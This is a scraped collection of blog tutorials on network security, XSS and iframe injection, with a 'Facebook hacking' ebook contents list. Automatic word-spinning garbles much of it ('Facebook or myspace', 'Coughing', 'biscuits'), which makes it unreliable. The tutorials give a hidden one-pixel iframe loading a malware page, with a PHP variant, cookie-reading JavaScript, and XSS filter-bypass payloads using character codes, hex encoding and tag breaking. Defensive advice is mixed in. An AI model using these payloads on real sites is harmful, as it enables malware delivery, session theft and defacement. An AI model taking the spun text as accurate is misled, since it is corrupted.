How Do You Secure Your System Against Hackers?


Program protection is a serious matter. A network allows you to discuss information and sources, but it also allows pc malware, human criminals, or even dissatisfied workers do far more harm than they could on a single device. Think about what would happen if every bit of information on your lan (LAN) disappeared, and you'll understand why protection is so important.
Here is a brief list of safety actions to think about when you're setting up a LAN:
Virtual information still needs physical protection. This could mean maintaining your hosting server in a closed room, eliminating hard pushes from work stations that don't need them, and setting up an home security system in your workplace. All the protection application in the world won't stop someone from splitting into your workplace and carting off your pc systems.
Beware of insects. Most pc malware are just a hassle, but it takes only one malicious malware to bring your network to its legs. Set up efficient anti-virus application, keep it modified, and practice your workers to use it. Think about other safety actions, such as setting up only shrink-wrapped professional application on your pc systems.
Network protection is a everyday job. Stay on top of changes that could impact the protection of your LAN. Keep your os modified with the newest protection areas and bug repairs. Allocate access to internet directories and other network sources on a need-to-have foundation, and eliminate a customer's account instantly when they keep your company. Use network signing and protection assessments to check your network for protection gaps and possible break-ins.


Pay attention to security passwords. One bad security password can bargain your entire system. Avoid security passwords that contain thesaurus terms or private information, and require customers to change their security passwords consistently. When an worker results in the company, turn off their security password instantly as part of the cancellations process.
Don't let trouble come contacting. Take special safety measures if you link your LAN to the outside world through a wi-fi hot spot at your local cafe or collection. Prevent wi-fi strikes by using secured security passwords or firewall program, which can be in the form of convenient components, such as a USB dongle.
Install a application firewall program. If you link your LAN straight to the Internet, set up a firewall program to screen both inbound and confident traffic. A application firewall program like Area Laboratories ZoneAlarm will also secure your system against harmful programs known as Virus horse that let criminals get into and take over your pc.
You may also like:
Protection Against Hacking

Free Facebook or myspace Id Coughing E-book Now


Table of Material : 
1. Facebook or myspace Guidelines & Techniques     
1.1 Facebook or myspace Guidelines     
1.2. a way to get noticable Facebook or myspace variety   
1.3. a way to access Facebook or myspace from G mail
1.4. Facebook or myspace Feelings codes
1.5. a way to exchange Facebook or myspace in your PC…
 1.6. exchange your data 
1.7. Transfer your publication in Facebook or myspace 
    1.8. a way to get noticable if someone compromised your Facebook or myspace account
1.9. a way to variation your name in Facebook
1.10. Trade Contact information of your Facebook or myspace account
1.11. a way to generate Facebook or myspace ID card  
    1.12. a way to cover up your Current e-mail deal with from Facebook or myspace apps
1.13. a way to Remove and Stop Facebook or myspace consideration 
1.14. a way to exchange Facebook or myspace image record 
   1.15. a way to add a community (discussion board) to a web page 
    1.16. Experience guide anti-virus   
----------------------- Page 3-----------------------
1.17. a way to aware Facebook or myspace fan web page in your E-mail…  
 1.18. a way to Show UN organization is on-line on Facebook or myspace after you ar in off-line mode…
    1.19. a way to deliver SMS victimisation Facebook… 
   1.20. a way to get noticable new pages you would possibly like  
  1.21. a way to watch loading TV on Facebook or myspace  
   1.22. a way to generate a map of your Facebook or myspace friend…     
1.23. Cartoon image in Experience guide 
  1.24. colored written text, strong, underline, happiness in Facebook or myspace status…
    1.25. a way to turn off Facebook or myspace Timeline…    
1.26. a way to turn off Public search of your Facebook or myspace information 
    1.27. a way to Post your Vacant standing
1.28. a way to Browse Obstructed Facebook or myspace 
2. Facebook or myspace internet Programs   
 2.1. a way to Routine Facebook or myspace deep massages Sendible     
 2.2. a way to get Facebook or myspace up-dates on your Email  
  2.3. a way to up-dates Facebook or myspace while not victimisation Experience guide    
 2.4. a way to be give observe once buddy changes tasks     
2.5. a way to study Facebook or myspace Profile History   
----------------------- Page 4-----------------------
    
2.6. a way to Turn Facebook or myspace status up-dates     
2.7. a way to get noticable Distributed video clips on Facebook or myspace    
 2.8. Catch the knowledge of your social System    
 2.9. Observe your kid Facebook or myspace action     
 2.10. Handle your personal & experienced image  
  2.11. a way to track Facebook or myspace Actions  
  2.12. generate mosaics Profile image on Facebook
2.13. on-line store on Facebook or myspace    
  2.14. on-line Experience guide Messenger…    
2.15. a way to Research Facebook or myspace Fan page…     
 2.16. a way to get noticable UN organization U. s. Countries friends you  
  2.17. a way to exchange Videos from Facebook or myspace     
2.18. a way to generate slide show of your Facebook or myspace record     
2.19. a way to generate Customized Facebook or myspace tab
2.20. a way to get Experience guide in exceed  
   2.21. a way to link Search engines documents to Facebook
 3. Facebook or myspace software system & Plug-ins     
 3.1. Facebook or myspace Color Filter   
----------------------- Page 5-----------------------
    3.2. Facebook or myspace contributes blocker   
  3.3. a way to link Facebook or myspace, Twitter& Search engines 
3.4. Facebook or myspace Toggle all  
  3.5. a way to Facebook or myspace Talk on your pc Adium
    3.6. Facebook or myspace based mostly applications program 
     3.7. Facebook or myspace E email distressing person   
 3.8. a way to link perspective to Facebook or myspace 

    4. Facebook or myspace Coughing & Security   
  4.1. Facebook or myspace phishing  
  4.2. Facebook or myspace parole Decryp
tor  
  4.3. applications program Successfully pass study … 
   4.4. a way to Crack Facebook or myspace victimisation Key logger   
   4.5. a way to Crack parole victimisation Facebook or myspace Cyberpunk  
    4.6. a way to delete Your buddy Account inside twenty four hour
    4.7. a way to protect your Facebook or myspace consideration from Coughing   
  4.8. a way to protect yourself from Key logger & phishing attack


What is Computer/Browser Cookies? ~Use of Cookies

 What is Cookies?
HTTP cookie or Online browser Cookie are used to shop the details about the guests. Also cookies used to shop the Sign in informations(username ,passwords). It will be useful to monitor guests wish so that display the appropriate details or ads.

Different Kinds of Cookies:
Session cookie
A period cookie up to certain time,depending on website.  After the period time, it will be damaged.


Persistent Cookie
A chronic cookie will last longer than customer classes. If a chronic cookie has its Max-Age set to 1 season, then, within the season, the preliminary value set in that cookie would be sent back to the hosting server whenever the customer frequented the hosting server. This could be used to history a essential item of details such as how the customer originally came to this website. Because of this, chronic cookies are also known as monitoring cookies or in-memory cookies.

Secure cookie
Secure cookies are secured cookies. If you used HTTPS(secure Connection), then it will shop the cookies in secured structure. Even online hackers grab the cookie, he is able to see only the secured information.
Example:
Bank sites always use Protected Cookies.

HttpOnly cookie
The HttpOnly cookie is reinforced by most contemporary internet explorer. On a reinforced browser, an HttpOnly period cookie will be used only when transferring HTTP (or HTTPS) demands, thus reducing accessibility from other, non-HTTP APIs (such as JavaScript). This limitation mitigates but does not remove the risk of period cookie robbery via Cross-site scripting.[15]. It is essential recognize this function is applicable only to session-management cookies, and not other browser cookies.

Third-party cookie
Third-party cookies will shop the cookies with another sector.
For Example:
www.example.com will shop the cookies with ad.advertise12.com
At one time, another website also set cookies with same sector.
www.othersite.com will shop the cookies with ad.advertise12.com

Supercookie
A "supercookie" is a cookie with a community suffix sector, like .com, .co.in,.in.

Most internet explorer, by standard, allow first-party cookies—a cookie with sector to be the same or sub-domain of the inquiring variety. For example, a customer viewing www.example.com can have a cookie set with sector www.example.com or .example.com, but not .com. A supercookie with sector .com would be obstructed by browsers; otherwise, a harmful website, like enemy.com, could set a supercookie with sector .com and probably affect or impersonate genuine customer demands to example.com.

Zombie cookie
A zombie cookie is any cookie that is instantly regenerated after a customer has removed it. This is achieved by a program saving the material of the cookie in some other places, such as the regional storage space available to Display material, HTML5 storages and other customer aspect systems, and then re-creating the cookie from back-up shops when the cookie's lack is recognized.

What is the use of Cookies?
Session management
Cookies may be used to sustain information appropriate to the customer during routing, probably across several trips. Cookies were presented to offer a way to apply a "shopping cart" (or "shopping basket"), a exclusive system into which customers can shop products they want to buy as they get around throughout the website.

Personalization
Cookies may be used to keep in mind the details about the customer who has frequented a website to be able to demonstrate appropriate material later on. For example a web hosting server may deliver a cookie containing theusername last used to log in to a website so that it may be loaded in for upcoming trips.

Tracking
Tracking cookies may be used to monitor internet users' web surfing around routines. This can also be done in aspect by using the IP deal with of the pc inquiring the site or the referrer area of the HTTP demand headlines, but cookies allow for higher perfection.

Self-XSS (Cross Website Scripting) :Social Technological innovation Strike and Avoidance (Facebook)



What is Self-XSS?
Self-XSS is one of the popular Social Technological innovation Strike used by Assailants to technique customers into insert the harmful value in web browser.  Results in enemy obtaining to the whatever website you visit. Usually fraudsters use this attack for fooling customers to buy products or get money through paid study .

Recently, Online hackers Assaulted Facebook or myspace with precise serious adult pictures. Facebook or myspace says it might be self-Xss Attack .

Javascript can be implemented in web browser url bar.
For example , enter the following code in your browser:
javascript:alert('BreakTheSecurity');
This will display a pop up box with "BreakTheSecurity".  An enemy can use this for harmful objective. He can grab Private information, biscuits, divert to viruses websites and more.
For Eg:
Entering the following value will display the biscuits in your browser:
javascript:alert("Cookies:"+document.cookies+"  "+"\n By \n BreakTheSecurity");

    The above value is not going to anything maliciously other than showing the biscuits.  But an enemy can increase the program so that it can take benefits your information.

    Security Guidelines from BreakTheSecurity:
    Use NoScript add on that will avoid javascript operating in your web browser.
    Don't simply select the shorthand web addresses for Example: bit.ly/55ewEb?22.  This may divert to an contaminated websites.
Conscious of Public Engineering:
If anyone ask you(even if he is your friend) to insert the programs in web browser bar, Never do this error.  
If anyone says "Iphone only $10", Don't desperate to just click it. 
If anyone says "1000 stocks will treat a baby", Never do this error. Facebook or myspace stocks never help to get cash or help to treat child.
God provide us with the 6th Feeling,Use it and think before you just click any hyperlinks or following the other guidelines.

DOM Centered Combination Website Scripting(XSS) weeknesses Tutorial


What is DOM?
DOM is extended as Papers item design that allows client-side-scripts(Eg: Javascript) to dynamically accessibility and change the material, framework, and design of a web site.

Like server-side programs, client-side programs can also agree to and operate customer feedback with the help of DOM.

Here is a very easy HTML value that allows and creates customer feedback using JavaScript with the help of DOM.

<html> 
<head>
</head>
<body>
     <script>
var pos=document.URL.indexOf("BTSinput=")+9;  //finds the place of value 
var userInput=document.URL.substring(pos,document.URL.length); //copy the value into userInput variable
document.write(unescape(userInput)); //writes material to the webpage
  </script>
</body>
</html>

If you know HTML and Javscript, knowing the above value is easy.

In the above example, the javascript value gets value from the url parameter "BTSinput" and creates the value in our web site.

For example, if the url is
               www.BreakThesecurity.com/PenTesting?BTSinput=default
The web site will show "default" as outcome.

Did you observe ?! The aspect of the web site is not published by Server-side program.  The consumer aspect program changes the material dynamically depending on the feedback.   Everything done with the help of DOM item 'document'.

DOM Centered XSS vulnerability:
When a designer creates the material using DOM item without cleaning the customer feedback , it allow an enemy to run his own value.  

In above example, we did not clean the feedback and basically shown the whatever value we get from the url.  

An enemy with harmful objective can provide a xss vector instead .  For example:

www.BreakThesecurity.com/PenTesting?BTSinput=<script>alert("BreakTheSec")</script>


As i said previously, the papers.write operate basically creates the value of BTSinput parameter in the website.  So it will create the '<script>alert("BreakTheSec")</script>' in the website without cleaning.  This outcomes in operating the program value and shows the aware box.


Patching the DOM Centered Combination Website Scripting Vulnerability
Audit all JavaScript value in use by your program to create sure that untrusted information is being runaway before being published into the papers, analyzed, or sent as aspect of an AJAX demand. There are a multitude of JavaScript features and qualities which must be secured, such as some which are rather non-obvious:

The papers.write() function
The papers.writeln() function
The eval() operate, which carries out JavaScript value from a string
The execScript() operate, which performs in the same way to eval()
The setInterval(), setTimeout(), and navigate() functions
The .innerHTML residence of a DOM element
Certain CSS qualities which allow URLs such as .style, .backgroundImage, .listStyleImage, etc.
The occasion owner qualities like .onClick, which take JavaScript value as their values

Any information which is resulting from information under the customer's management (e.g. demand factors, headers, question factors, biscuit titles and principles, the URL of the demand itself, etc.) should be runaway before being used. Illustrations of user-controlled information consist of papers.location (and most of its qualities, e.g. papers.location.search), papers.referrer, biscuit titles and principles, and demand headlines titles and principles.

You can use the JavaScript built-in features encode() or encodeURI() to deal with your getting out of. If you create your own getting out of features, be incredibly cautious. Rather than using a "black list" strategy (where you narrow risky figures and successfully pass everything else through untouched), it is better to use a "white list" strategy. A excellent white-colored record strategy is to evade everything by standard and allow only alphanumeric figures through.

Combination Website Scripting(XSS) Finish Guide for Beginners~ Web Program Vulnerability



What is XSS?
Cross Site Scripting also known as XSS , is one of the most typical web appliction weeknesses that allows an enemy to run his own customer part scripts(especially Javascript) into web pages viewed by other customers.


In a typical XSS strike, a cyberpunk provide his harmful javascript value in the legitimate website . When a customer examine out the specially-crafted weblink , it will perform the harmful javascript. A efficiently utilized XSS weeknesses will allow assailants to do phishing strikes, grab accounts and even viruses.
Example :Let us think about, a cyberpunk has discovered XSS weeknesses in Googlemail and injectmalicious program. When a customer examine out your website, it will perform the harmful program. The harmful value can be used to divert customers to fake search engines mail web page or capture biscuits. Using this thieved biscuits, he can sign in into your consideration and change security password.
It will be clear and understandable XSS , if you have the following prerequisite:
Strong Information in HTML,javascript(Reference).
Basic Information in HTTP client-Server Architecure(Reference)
[optional]Basic Information about hosting server part programming(php,asp,jsp)  

XSS Attack:
Step 1: Discovering Insecure Website
Hackers use search engines lady for choosing the vulnerable websites for example  "?search=" or ".php?q=" .  1337 target specific websites instead of using look for.  If you are going to analyze your site, you have to examine every web page in your site for the weeknesses. 

Step 2: Testing the Vulnerability:
First of all, we have to discover a feedback area so that we can provide our own program, for example: look for box,username,password or any other feedback areas.


Test 1 :
Once we discovered the feedback area, let us try to put some sequence within the area, for example let me feedback "BTS". It will show the  result .

Now right click on the page and select view source.   search for the string "BTS" which we entered in the input field.  Note the location where the input is placed.


Test 2:
Now we are going to examine whether the hosting server clean our feedback or not.  In order to do this , let us feedback the <script> tag within the feedback area. 
 

View the source of the page . Find the location where input displayed place in previous test.

Thank god, our code is not being sanitized by the server and the code is just same as what we entered in the field. If the server sanitize our input, the code may look like this &lt;script&gt;. This indicates that the website vulnerable to XSS attack and we can execute our own scripts .

Step 3: Exploiting the vulnerability
Now we know the site is somewhat vulnerable to XSS attack.  But let us make sure whether the site is completely vulnerable to this attack by injecting a full javascript code.  For instance, let us input <script>alert('BTS')</script> .

Now it will display pop-up box with 'BTS' string. Finally, we successfully exploit the XSS .  By extending the code with malicious script, a hacker can do steal cookies or deface the site and more.

Types of XSS Based on persisting capability:
Based one Persistence capability, we can categorize the XSS attack into two types namely Persistent and Non-Persistent.

Persistent XSS:

The Persistent or Stored XSS attack occurs when the malicious code submitted by attacker is saved by the server in the database, and then permanently it will be run in the normal page.

For Example:   
Many websites host a support forum where registered users can ask their doubts by posting message  , which are stored in the database.  Let us imagine , An attacker post a message containing malicious javascript code instead.  If the server fail to sanitize the input provided, it results in execution of injected script.  The code will be executed whenever a user try to read the post. If suppose the injected code is cookie stealing code, then it will steal cookie of users who read the post. Using the cookie, attacker can take control of your account.


Non-Persistent XSS:

Non-Persistent XSS, also referred as Reflected XSS , is the most common type of XSS found now a days. In this type of attack, the injected code will be send to the server via HTTPrequest.  The server embedd the input with the html file and return the file(HTTPResponse) to browser.  When the browser executes the HTML file, it also execute the embedded script.  This kind of XSS vulnerability frequently occur in search fields.

Example:
Let us consider a project hosting website.  To find our favorite project, we will just input the related-word in the search box .  When searching is finished, it will display a message like this "search results for yourword " .  If the server fail to sanitize the input properly, it will results in execution of injected script.

In case of reflected XSS attacks, attacker will send the specially-crafted link to victims and trick them into click the link. When user click the link, the browser will send the injected code to server, the server reflects the attack back to the users' browser.  The browser then executes the code .

In addition to these types, there is also third  type of attack called DOM Based XSS attack, i will explain about this attack in later posts.

What can an attacker do with this Vulnerability?
  • Stealing the Identity and Confidential Data(credit card details).
  • Bypassing restriction in websites.
  • Session Hijacking(Stealing session)
  • Malware Attack
  • Website Defacement
  • Denial of Service attacks(Dos)

Disclaimer:
This article is intended for educational purpose only.

What is an IFrame Injection? Huge IFrame Strike Tutorial



What is an IFrame Injection?
Using IFrame tag, The Assailants inserts the viruses contain website(links) using Combination website Scripting in well-known websites.  So if the regular guests of that well-known websites reveals the website, it will divert to viruses contain website.  Malware  will be packed to your pc, now you are infected

Disclaimer:
This is simply for Academic objective only. Don't use it for unlawful.if you do,  you will be in prison.

What is IFrame Tag?
<Iframe> tag appears for Inline Structure.  It is used to place material from another website or hosting server.  That can be useful for developing on the internet programs.

IFrame Hypodermic injection Attack:
Malware Assailants use this IFrame and consist of the viruses websites. They are able to consist of the website one pixel square(You won't able to see it in webpage). Obfuscate the JavaScript that will run instantly from that involved web page so that it looks something like %6C%20%66%72%61%6D%65%62%6F - making no apparent hint that it's harmful.

What an enemy can do with Iframe Injection?
Using Iframe Hypodermic injection, an enemy can provide ads within any other websites, place viruses contaminated website hyperlinks, divert to viruses contaminated websites and more.

Iframe Hypodermic injection Tutorial:
1.First of all enemy will get the Insecure websites using search engines dorks.
2. They analyze the weeknesses by placing some iframe tag using the url.
3. then place the Malicious Iframe value within the website.
For Example:
he can place this value using the url:
<iframe src=”http://malwarewebpages/web.html” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

For php webpages:
echo “<iframe src=\”http://malwarewebpages/web.html\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;

Obfuscate javascript
<script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){…

4. So if the customers fill web page, his program will be contaminated.


What you have to do ,if youinfected by Iframe Injection?

Change your security passwords of ftp, cpanel and data source.
Inform to your web host assistance about the injection strike and they will manage hosting server injection .
Download all your information from the web host and  examine whether they are contaminated or not. if you discovered any contaminated information, fresh it.
Buy a excellent anti-virus application, Check out your Computer absolutely.
Don't use the Community techniques for signing into your Hosting assistance.
Webmasters  should take care(affects web pagerank,visitors)
Webmaster, If you discover your website is contaminated by Iframe Hypodermic injection, then try to fresh it as soon as possible before search engines finds it.  If the search engines finds it, it will display the Pop up concept to your customers " This website may damage your computer". Definitely , customers won't come returning to your website .  Also search engines will set dark indicate for your website.  You will missing your web pagerank and guests.

If you want to examine the what search engines believes about your websites, then use this link:
http://www.google.com/safebrowsing/diagnostic?site=http://siteurl



Skipping the XSS Filtration : Innovative XSS Guides for Web program Pen Testing



Sometimes, webmaster use XSS filters(WAF) to prevent XSS weeknesses.
For eg: if you put the <scirpt>alert("hi")</script> , the Narrow will evade the "(quote) personality , so the program will become
<script>alert(>xss detected<)</script>
Now this program won't perform. Furthermore Filtration use different kind of filtration technique to provide security against the XSS.  In this situation, we can use some techniques to avoid the narrow.  Here i am going to protect that only. 

1.Bypassing magic_quotes_gpc

The magic_quotes_gpc=ON is a PHP setting(configured in PHP.ini File) , it goes out the every ' (single-quote), " (double quote) and \  with a backslash instantly.
For Eg:
<scirpt>alert("hi");</script> will be strained as <script>alert(\hi\)</script>.so the program won't perform now. 

This is well known filtration technique, but you can avoid this narrow by using ASCII figures instead.
For Eg:  alert("hi"); can be transformed to
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)
so the program will become <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>.  In this situation there is no "(quotes) or '(single quotes) or / so the narrow can't narrow this factor.  Yes, it will efficiently run the program.
String.fromCharCode() is a javascript operate that transforms ASCII value to Figures.

How to convert to ASCII values?
There are some websites that transforms to ASCII personality. But i recommend you to use Hackbar Mozilla add-on .

After setting up hackbar add on ,press F9.  It will start the little box above the url bar. simply select the XSS->String.fromCharCode()

Now it will pop-up small screen. get into the value for example alert("Hi").  simply click ok key.  Now we got the outcome.

duplicate the value into the <script></script> within and place in the insecure sites

For eg: 
hxxp://vulnerable-site/search?q=<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>

2.HEX Encoding

we can scribe our whole program into HEX value so that it can't be strained. 
For example:  <script>alert("Hi");</script> can be turn to HEX as:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
Now put the value in the insecure website demand.
For ex: 
hxxp://vulnerable-site/search?q=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
 Transforming to HEX:
This website will turn to hex code: http://centricle.com/tools/ascii-hex/ 

3.Bypassing using Obfuscation

Some web page administration put the program,alert in limited term record.  so whenever you feedback this look for phrases, the narrow will eliminate it and will provide mistake concept like "you are prohibited to look for this". This can side stepped by modifying the situation of the keywords(namely Obfuscation).  
For eg:
<ScRipt>ALeRt("hi");</sCRipT>

This avoid strategy hardly ever works but providing test is worth. 

4. Ending Tag

Sometimes placing "> at the starting of the value will work. 

"><script>alert("Hi");</script>

This will end the past started out tag and start our program tag.
Example:
hxxp://vulnerable-site/search?q="><script>alert("Hi");</script>
Conclusion:
From above content, it is obvious that XSS filtration alone not going to protected a website from the XSS strikes. If you really want to create your website more protected, then ask PenTesters to analyze your program or analyze yourself.

Also there are lot of different narrow skipping strategy, i just protected some useful methods for you
.